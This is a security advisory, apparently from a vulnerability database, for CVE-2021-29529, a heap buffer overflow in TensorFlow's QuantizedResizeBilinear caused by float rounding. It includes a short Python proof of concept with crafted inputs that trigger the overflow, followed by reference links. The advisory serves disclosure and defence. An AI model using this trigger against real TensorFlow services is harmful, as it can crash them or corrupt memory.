CVE-2021-29529: Heap buffer overflow caused by rounding
(updated )
An attacker can trigger a heap buffer overflow in tf.raw_ops.QuantizedResizeBilinear by manipulating input values so that float rounding results in off-by-one error in accessing image elements:
import tensorflow as tf
l = [256, 328, 361, 17, 361, 361, 361, 361, 361, 361, 361, 361, 361, 361, 384]
images = tf.constant(l, shape=[1, 1, 15, 1], dtype=tf.qint32)
size = tf.constant([12, 6], shape=[2], dtype=tf.int32)
min = tf.constant(80.22522735595703)
max = tf.constant(80.39215850830078)
tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, max=max,
align_corners=True, half_pixel_centers=True)
References
- github.com/advisories/GHSA-jfp7-4j67-8r3q
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-457.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-655.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-166.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/f851613f8f0fb0c838d160ced13c134f778e3ce7
- github.com/tensorflow/tensorflow/security/advisories/GHSA-jfp7-4j67-8r3q
- nvd.nist.gov/vuln/detail/CVE-2021-29529
Detect and mitigate CVE-2021-29529 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →